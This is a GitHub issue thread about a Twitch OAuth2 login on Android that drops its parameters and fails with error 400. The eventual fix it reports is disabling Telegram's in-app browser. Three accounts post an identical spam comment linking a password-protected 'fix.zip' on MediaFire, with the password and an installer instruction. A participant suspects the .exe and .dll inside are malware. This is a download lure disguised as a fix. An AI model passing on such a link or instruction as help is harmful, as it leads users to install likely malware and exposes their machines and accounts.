### ISSUE TITLE
Oauth ERROR on andorid

### ISSUE THREAD

**Issue by Propants05** [twitchdev/issues#985]
I have a service to let your subscribers access the telegram group,

what happens:
from android phone
when they click on the oauth2 link, it takes them back to the twitch app, then to the default browser, asking them to log in, once logged in it takes them back to oauth2, but it deletes all the parameters except the client-id giving this error:

![image](https://github.com/user-attachments/assets/90e75988-a875-483c-9379-a5871cdf9208)

I encoded the link 
`https%3A%2F%2Fcrewmaster.net%2Foauth%2Ftwitch`
and did various tests with various people, I noticed that the problem appears when the user does not have already logged in, but has to do it and once logged in with their credentials they get the error 400

i have tried to put the redirect link at the last, but is the same error

I repeated these tests, with various links, and various combinations, more or less 30 tests for each link variation, but the problem was always the same.

**Comment by Wissididom** [comment]
The zip contains a .dll and a .exe and therefore I don't think it is related to that because the error report is about android. I rather think that those files might be malware, but I haven't checked that yet.

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by itbear-shu** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NaiveShiki** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Propants05** [comment]
which zip?

**Comment by Wissididom** [comment]
> which zip?

There was a MediaFire link spammed, which was deleted by the people with access to delete stuff in this thread.

**Comment by Propants05** [comment]
Ah, so it's not a thing directly from me, and for the oauth problem, how can it be solved?

**Comment by Propants05** [comment]
> > which zip?
> 
> There was a MediaFire link spammed, which was deleted by the people with access to delete stuff in this thread.

Ah, so it's not a thing directly from me, and for the oauth problem, how can it be solved?

**Comment by Propants05** [comment]
> > which zip?
> 
> There was a MediaFire link spammed, which was deleted by the people with access to delete stuff in this thread.

Ah, so it's not a thing directly from me, and for the oauth problem, how can it be solved?

**Comment by GiovanniMontenegro** [comment]
I found the problem. It's the browser-in-app feature of telegram. If u disable it, the auth process will work again.
